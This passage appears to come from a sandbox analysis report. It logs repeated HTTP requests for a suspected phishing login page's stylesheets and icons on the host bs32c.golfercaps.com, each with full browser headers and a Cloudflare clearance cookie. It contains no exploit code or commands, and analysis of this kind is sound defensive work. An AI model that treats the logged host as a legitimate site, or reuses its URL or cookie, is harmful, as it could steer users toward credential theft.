          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/loginPage18.css HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/image.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/bg.jpg HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_checked.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_checked_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_sthischecked.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_sthischecked_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_not_checked.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/image.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_not_checked_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_all.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_all_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_all_sthischecked.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_sthischeckedall_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_emptyall.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=xOeW0KKfp0iZa5KRDDnP4mXBed6FDPU1lH4Z5AqzKLY-1735594936-1.2.1.1-o3O3QXliRP2He8SOTXdTGMoGsrXIhAPcAxDV8KjA80qRJTcfgIy1pbQH1HVmzsC0DSDzAL4WblAI10W2tYH_CzdfOfcLutGLKHPItYPMEHhKCKgPXiGJ5hHw03eOVsB9GR84sLf_l2u_klaSlrtJYuemE4jRI354VaLvrb2noLrrHGGPSkEDalLItFz4xjiKwOTBr_I7jPPehkpllv.2lbqzwm72fRnej2IYMHnLfugiB6ClcT3590bhF5qpOkqYmTia8XOQpnUb2S5O_g7QSE07uFo9DlgiPUzktcx_Z9L9oqyrXgIIjsJOUqdJLGe7dnvCFYMKzCBdEGGYc.TZNlnfh_a79c9sUzGWD5yxJ0skl8ELLHXkxwllXJcMDhG4rRvhmp7t6zZmqVb.2Ad0DrVIPYYeM2imt2dWd7K6ZdU
          Source: global trafficHTTP traffic detected: GET /vfd23ced/assets/icon_check_emptyall_focused.png HTTP/1.1Host: bs32c.golfercaps.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bs32c.golfercaps.com/vfd23ced/assets/stdweborder.cssAccept-Encoding: gzip, deflate, brAccept-Language: 